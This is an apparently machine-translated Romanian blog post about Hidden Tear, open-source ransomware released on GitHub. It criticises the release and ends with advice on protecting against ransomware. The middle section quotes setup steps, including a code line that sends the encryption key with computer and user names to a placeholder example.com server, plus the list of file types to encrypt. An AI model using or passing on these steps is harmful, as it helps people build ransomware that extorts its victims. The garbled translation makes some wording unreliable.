Fibonacci Impact

Soluții Software și Web

Codul sursa al unui Malware Ransomware publicat pe GitHub

Ransomware este un tip de malware care împiedică sau limitează accesul utilizatorilor la sistemul lor. Acest tip de malware forțează victimele sale de a plăti răscumpărarea prin anumite metode de plată on-line, în scopul de a acorda acces la sistemele lor, sau pentru a obține date înapoi. Unele ransomware criptează fișiere (numite Cryptolocker).

Nu intrați în panică! Ai auzit bine.
Un cercetator de securitate turc pe nume Utku Sen a postat un cod Ransomware complet funcțional pe open source site de partajare de cod GitHub.
Tear Hidden Ransomware numit, foloseste AES criptare pentru a bloca în jos fișiere înainte de afișarea unui mesaj de avertizare răscumpărare pentru a ajunge utilizatorilor să plătească.

Versiunea în prezent nedetectabile de ransomware poate fi modificat și implementate în mod corespunzător, deoarece conține toate facilitățile de infractor cibernetic poate aștepta de la malware moderne.
Sen descrie Ransomware sa ca „un fișier mostră crypter ransomware-ca, care pot fi modificate pentru scopuri specifice.” Acest lucru înseamnă chiar script kiddies pot dezvolta acum propriul Ransomware să amenințe oamenii.
Ascunse Tear – Kit Ransomware gratuit
De „Hidden Lacrima” pachetul Ransomware este format din patru dosare și anume:
Hidden-Tear-Decrypter
Hidden-rupere
.gitignore
README.md
Hidden Tear Ransomware este capabil de:
Folosind algoritmul AES pentru a cripta fișiere
Trimiterea cheie de criptare pentru un server
Criptarea fișierelor și decriptarea lor folosind un program Decrypter cu cheia de criptare
Crearea unui fișier text în Desktop cu mesajul dat
Fișier de dimensiune mică (12 KB)
Eschivarea de detectare prin toate programele standard de anti-virus
Cum să Setup-ul personalizat Ransomware Utilizarea Hidden Tear?
Sen a precizat detalii de utilizare, precum și, el spune:
1. Trebuie să aveți un server de web care acceptă limbaje de scripting cum ar fi PHP sau Python. Apoi schimba linia de mai jos-menționat cu adresa URL. (Mai bună conexiune utilizarea HTTPS pentru a evita interceptarea):
string targetURL = „https://www.example.com/hidden-tear/write.php?info=”;
2. Scenariul ar trebui să scrie parametrul GET într-un fișier text. Trimiterea proces care rulează în SendPassword () funcție:
info string = COMPUTERNAME + „-” + NumedeUtilizator + „” + parola;
var fullurl = targetURL + info;
var conent = System.Net.WebClient nou () DownloadString (fullurl).;
3. extensii de fișiere țintă poate fi, de asemenea, o schimbare. Lista implicită:
validExtensions var = new [] {„. txt”, „.doc”, „.docx”, „.xls”, „.xlsx”, „.ppt”, „.pptx”, „.odt”, „.jpg „,” .png „,” .csv „,” .sql „,” .mdb „,” .sln „,” .php „,” ASP „,” aspx „,” .html „,” .xml „,” PSD „};
Pentru scop educativ … într-adevăr!
Așteaptă! Sen are ceva mai mult de spus, asculta la care s-ar putea gândi … într-adevăr !!
Cu întregul proiect „Hidden Tear”, există un avertisment legal atașat care spune:
„În timp ce acest lucru poate fi de ajutor pentru unii, există riscuri semnificative. Anii Tear ascunse” pot fi utilizate numai pentru „scopuri educaționale.” Nu-l utilizați ca un Ransomware! Ai putea merge la închisoare pe obstrucție de taxe justiție doar pentru rularea lacrimă ascunsă, chiar dacă sunt nevinovați. ”
Cineva ar trebui să-l întreb … De ce instigare oameni să comită o crimă? S-ar putea imagina astfel de „scopuri educaționale” ca exista o mare șansă de Ransomware la pop-up în atacurile recente.
O vizita la demonstrație video de testare sandbox de „Lacrima ascunse” va oferi o imagine reală a ceea ce tot ce este capabil de a face.
Cum sa te protejezi de Ransomware amenințare?
În urmă cu două luni, va introdus o gratuit Ransomware Decriptarea și Malware Removal ToolKit care ar putea ajuta te descurci cu diferite variante de ransomware, precum și a vă ajuta să debloca fișiere criptate fără achitarea la infractori cibernetici.
Cu toate acestea, există unele pași importanți care ar trebui să fie luate în considerare pentru a vă proteja împotriva amenințărilor ransomware.
Păstrați întotdeauna copii de siguranță periodice ale datelor importante.
Asigurați-vă că rulați o suită de securitate activ anti-virus de instrumente pe sistemul dumneavoastră.
Nu deschideți atașamente e-mail de la surse necunoscute.
Cel mai important, naviga pe Internet în condiții de siguranță întotdeauna.
Pentru a vă păstra în siguranță, avem, de asemenea, un articol excelent pe Cum de a proteja computerul de malware ransomware?

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *